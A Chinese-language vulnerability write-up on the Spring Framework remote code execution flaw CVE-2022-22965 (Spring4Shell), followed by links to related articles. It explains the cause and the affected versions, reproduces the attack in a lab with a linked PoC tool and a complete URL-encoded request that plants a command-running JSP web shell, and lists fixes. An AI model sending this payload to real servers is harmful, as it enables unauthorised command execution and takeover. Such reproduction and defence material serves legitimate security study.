2. 程式人生 > 其它 >Spring Framework遠端程式碼執行漏洞(CVE-2022-22965)

Spring Framework遠端程式碼執行漏洞(CVE-2022-22965)

阿新 發佈:2022-04-22

一、漏洞描述

springframework 是spring 裡面的一個基礎開源框架,主要用於javaee的企業開發。

2022年3月30日,Spring框架曝出RCE 0day漏洞,攻擊者通過該漏洞可遠端實現對目標主機的後門檔案寫入和配置修改,繼而通過後門檔案訪問獲得目標主機許可權。

二、漏洞成因

該漏洞是由於 Spring Core 未對傳輸的資料進行有效的驗證。Spring MVC 框架提供引數繫結功能,允許用請求中的引數繫結控制器方法中引數物件的成員變數。這一機制使得攻擊者能夠通過構造惡意請求獲取 AccessLogValve 物件,繼而注入惡意欄位值觸發 pipeline 機制,從而能夠在未授權的情況下遠端構造惡意資料,寫入任意路徑下的檔案,從而導致遠端程式碼執行。

三、影響版本

Spring Framework 5.3.X < 5.3.18 

Spring Framework 5.2.X < 5.2.20

注:其他小版本未更新均受影響

四、利用條件

  • JDK 版本 >= 9
  • 使用了 Spring 框架或衍生框架
  • CachedIntrospectionResults.class

五、漏洞復現

復現環境:vulfocus靶場

註冊登入後,啟動Spring Framework 遠端命令執行漏洞環境。

 

 

 python工具復現:

工具下載地址:https://github.com/reznok/Spring4Shell-POC

 

瀏覽器訪問http://123.58.236.76:16164/shell.jsp?cmd=whoami即可看到“whoami”命令成功執行。

 

 

 

 

 

burp工具復現:

 EXP:

?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte
 
%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

 

訪問時抓包,在"/"後插入EXP,並在請求頭中插入如下字樣:

suffix: %>//

c1: Runtime

c2: <%

DNT: 1

Content-Length: 2

 

 

放包後訪問123.58.236.76:17594/tomcatwar.jsp?pwd=j&cmd=id即可看到“id”命令成功執行。

 

 

六、修復建議

一、官方修復建議:

當前 Spring Framework 官方已釋出最新版本,建議受影響的使用者及時更新升級到最新版本。連結如下:

https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement

二、臨時修復建議:

該臨時修復建議存在一定風險,建議使用者可根據業務系統特性審慎選擇採用臨時修復方案:

需同時按以下兩個步驟進行漏洞的臨時修復:

1. 在應用中全域性搜尋 @InitBinder 註解,看看方法體內是否呼叫 dataBinder.setDisallowedFields 方法,如果發現此程式碼片段的引入,則在原來的黑名單中,新增 {"class.*","Class. *","*. class.*", "*.Class.*"}。(注:如果此程式碼片段使用較多,需要每個地方都追加)

2. 在應用系統的專案包下新建以下全域性類,並保證這個類被 Spring 載入到 (推薦在 Controller 所在的包中新增). 完成類新增後,需對專案進行重新編譯打包和功能驗證測試。並重新發布專案。

相關推薦

Spring Framework遠端程式碼執行漏洞CVE-2022-22965

一、漏洞描述 springframework 是spring 裡面的一個基礎開源框架,主要用於javaee的企業開發。

Spring Framework 遠端命令執行漏洞CVE-2022-22965

Spring Framework 遠端命令執行漏洞 CVE-2022-22965  近日,Spring 官方 GitHub issue中提到了關於 Spring Core 的遠端命令執行漏洞,該漏洞廣泛存在於Spring 框架以及衍生的框架中。

開源應用框架Spring Framework存在遠端程式碼執行漏洞CVE-2022-22965解決方案

監測發現,開源應用框架Spring Framework存在遠端程式碼執行漏洞(CVE-2022-22965)。經分析研判,在JDKJava開發工具包9及以上版本環境中,或版本低於5.3.18和5.2.20的Spring框架及衍生框架構建的網站或應用中,

Spring Framework遠端程式碼執行漏洞復現(CVE-2022-22965)

1.漏洞描述     漏洞名稱 Spring Framework遠端程式碼執行漏洞 公開時間 2022-03-29 更新時間

關於Spring Cloud Gateway 遠端程式碼執行漏洞CVE-2022-22947的安全告知

Spring Cloud Gateway 是 Spring Cloud 下的一個專案,該專案是基於 Spring 5.0、Spring Boot 2.0 和 Project Reactor 等技術開發的閘道器,它旨在為微服務架構提供一種簡單有效統一的 API 路由管理方式。

Spring Framework 遠端命令執行漏洞復現(CVE-2022-22965)

Spring Framework 遠端命令執行漏洞復現(CVE-2022-22965) 漏洞描述:   Spring core是Spring系列產品中用來負責發現、建立並處理bean之間的關係的一個工具包,是一個包含Spring框架基本的核心工具包,Spring其他元

sql server 遠端訪問informix_微軟 SQL Server 遠端程式碼執行漏洞CVE-2020-0618

技術標籤:sql server 遠端訪問informix 漏洞描述 近日,微軟釋出了2月安全更新公告,其中CVE-2020-0618 SQL Server 遠端命令執行漏洞在國記憶體在危害,SQL Server 在國內使用量大。

漏洞通告】Apache Struts2遠端程式碼執行漏洞CVE-2021-31805

轉至:https://www.venustech.com.cn/new_type/aqtg/20220413/23713.html 0x00 漏洞概述 CVE   ID CVE-2021-31805

WordPress 4.6遠端程式碼執行漏洞CVE-2016-10033復現環境搭建指南

首先是找到網上的漏洞分析和poc指令碼,WordPress <4.7.1 遠端程式碼執行漏洞非外掛無需認證,附Poc,演示視訊——具體關於漏洞的分析不多說了,這個說得很好了,主要是說環境搭建。

mongo-express 遠端程式碼執行漏洞CVE-2019-10758

mongo-express是一款mongodb的第三方Web介面,使用node和express開發。如果攻擊者可以成功登入,或者目標伺服器沒有修改預設的賬號密碼admin:pass,則可以執行任意node.js程式碼

S2-032 遠端程式碼執行漏洞CVE-2016-3081

影響版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3) 漏洞詳情: https://cwiki.apache.org/confluence/display/WW/S2-032

S2-046 遠端程式碼執行漏洞CVE-2017-5638

影響版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 漏洞詳情: https://cwiki.apache.org/confluence/display/WW/S2-046

S2-057 遠端程式碼執行漏洞CVE-2018-11776

影響版本:<=Struts 2.3.34,Struts 2.5.16 漏洞詳情: https://cwiki.apache.org/confluence/display/WW/S2-057

Spring Cloud Gateway 遠端程式碼執行漏洞復現CVE-2022-22947

漏洞說明 2022年3月1日,VMware官方釋出漏洞報告,在使用Spring Colud Gateway的應用程式開啟、暴露Gateway Actuator端點時,會容易造成程式碼注入攻擊,攻擊者可以製造惡意請求,在遠端主機進行任意遠端執行

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2019-7238

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.14.0及之前版本中,存在一處基於OrientDB自定義函式的任意JEXL表示式執行功能,而這處功能存在未授權訪問漏洞,將可以

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2020-10199

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.21.1及之前版本中,存在一處任意EL表示式注入漏洞

gitlist 0.6.0 遠端命令執行漏洞CVE-2018-1000533

gitlist是一款使用PHP開發的圖形化git倉庫檢視工具。在其0.6.0版本及以前,存在一處命令引數注入問題,可以導致遠端命令執行漏洞

GitLab 遠端命令執行漏洞CVE-2021-22205

GitLab是一款Ruby開發的Git專案管理平臺。在11.9以後的GitLab中,因為使用了圖片處理工具ExifTool而受到漏洞CVE-2021-22204的影響,攻擊者可以通過一個未授權的介面上傳一張惡意構造的圖片,進而在GitLab伺服器上執行

node-postgres 程式碼執行漏洞CVE-2017-16082

漏洞原理 node-postgres在處理型別為Row Description的postgres返回包時,將欄位名拼接到程式碼中。由於沒有進行合理轉義,導致一個特殊構造的欄位名可逃逸出程式碼單引號限制,造成程式碼執行漏洞

Nexus Repository Manager 3 遠端命令執行漏洞CVE-2020-10204

Nexus Repository Manager 3 是一款軟體倉庫,可以用來儲存和分發Maven、NuGET等軟體源倉庫。其3.21.1及之前版本中,存在一處任意EL表示式注入漏洞,這個漏洞CVE-2018-16621的繞過。